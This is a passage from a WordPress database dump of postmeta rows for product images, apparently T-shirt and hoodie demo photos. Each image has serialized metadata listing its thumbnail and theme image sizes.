reated_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(60,1220,'_wxr_import_parent','1231'),(61,1221,'_wp_attached_file','2013/06/T_2_back.jpg'),(62,1221,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2013/06/T_2_back.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"T_2_back-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"T_2_back-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"T_2_back-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:20:\"T_2_back-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:20:\"T_2_back-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:20:\"T_2_back-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(63,1221,'_wxr_import_parent','1231'),(64,1222,'_wp_attached_file','2013/06/T_4_front.jpg'),(65,1222,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:21:\"2013/06/T_4_front.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"T_4_front-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"T_4_front-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"T_4_front-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"T_4_front-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"T_4_front-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:21:\"T_4_front-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(66,1222,'_wxr_import_parent','1232'),(67,1223,'_wp_attached_file','2013/06/T_3_back.jpg'),(68,1223,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2013/06/T_3_back.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"T_3_back-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"T_3_back-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"T_3_back-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:20:\"T_3_back-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:20:\"T_3_back-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:20:\"T_3_back-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(69,1223,'_wxr_import_parent','1232'),(70,1224,'_wp_attached_file','2013/06/T_3_front.jpg'),(71,1224,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:21:\"2013/06/T_3_front.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"T_3_front-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"T_3_front-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"T_3_front-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"T_3_front-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"T_3_front-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:21:\"T_3_front-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(72,1224,'_wxr_import_parent','1232'),(73,1225,'_wp_attached_file','2013/06/T_4_back.jpg'),(74,1225,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2013/06/T_4_back.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"T_4_back-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"T_4_back-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"T_4_back-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:20:\"T_4_back-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:20:\"T_4_back-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:20:\"T_4_back-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(75,1225,'_wxr_import_parent','1232'),(76,1226,'_wp_attached_file','2013/06/T_5_front.jpg'),(77,1226,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:21:\"2013/06/T_5_front.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"T_5_front-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"T_5_front-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"T_5_front-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"T_5_front-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"T_5_front-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:21:\"T_5_front-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(78,1226,'_wxr_import_parent','1233'),(79,1227,'_wp_attached_file','2013/06/T_5_back.jpg'),(80,1227,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2013/06/T_5_back.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"T_5_back-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"T_5_back-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"T_5_back-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:20:\"T_5_back-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:20:\"T_5_back-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:20:\"T_5_back-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(81,1227,'_wxr_import_parent','1233'),(82,1228,'_wp_attached_file','2013/06/T_6_front.jpg'),(83,1228,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:21:\"2013/06/T_6_front.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"T_6_front-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"T_6_front-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"T_6_front-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"T_6_front-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"T_6_front-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:21:\"T_6_front-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(84,1228,'_wxr_import_parent','1234'),(85,1229,'_wp_attached_file','2013/06/T_6_back.jpg'),(86,1229,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2013/06/T_6_back.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"T_6_back-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"T_6_back-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"T_6_back-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:20:\"T_6_back-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:20:\"T_6_back-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:20:\"T_6_back-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(87,1229,'_wxr_import_parent','1234'),(88,49,'_wp_attached_file','2013/06/hoodie_2_back.jpg'),(89,49,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:25:\"2013/06/hoodie_2_back.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"hoodie_2_back-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"hoodie_2_back-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"hoodie_2_back-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"hoodie_2_back-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"hoodie_2_back-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"hoodie_2_back-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(90,49,'_wxr_import_parent','47'),(91,51,'_wp_attached_file','2013/06/hoodie_3_front.jpg'),(92,51,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:26:\"2013/06/hoodie_3_front.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"hoodie_3_front-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"hoodie_3_front-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"hoodie_3_front-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"hoodie_3_front-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"hoodie_3_front-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:26:\"hoodie_3_front-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(93,51,'_wxr_import_parent','50'),(94,52,'_wp_attached_file','2013/06/hoodie_3_back.jpg'),(95,52,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:25:\"2013/06/hoodie_3_back.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"hoodie_3_back-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"hoodie_3_back-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"hoodie_3_back-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"hoodie_3_back-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"hoodie_3_back-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"hoodie_3_back-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(96,52,'_wxr_import_parent','50'),(97,54,'_wp_attached_file','2013/06/hoodie_4_front.jpg'),(98,54,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:26:\"2013/06/hoodie_4_front.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"hoodie_4_front-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"hoodie_4_front-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"hoodie_4_front-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"hoodie_4_front-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"hoodie_4_front-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:26:\"hoodie_4_front-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(99,54,'_wxr_import_parent','53'),(100,55,'_wp_attached_file','2013/06/hoodie_4_back.jpg'),(101,55,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:25:\"2013/06/hoodie_4_back.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"hoodie_4_back-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"hoodie_4_back-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"hoodie_4_back-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"hoodie_4_back-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"hoodie_4_back-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"hoodie_4_back-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(102,55,'_wxr_import_parent','53'),(103,57,'_wp_attached_file','2013/06/hoodie_5_front.jpg'),(104,57,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:26:\"2013/06/hoodie_5_front.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"hoodie_5_front-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"hoodie_5_front-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"hoodie_5_front-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"hoodie_5_front-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10: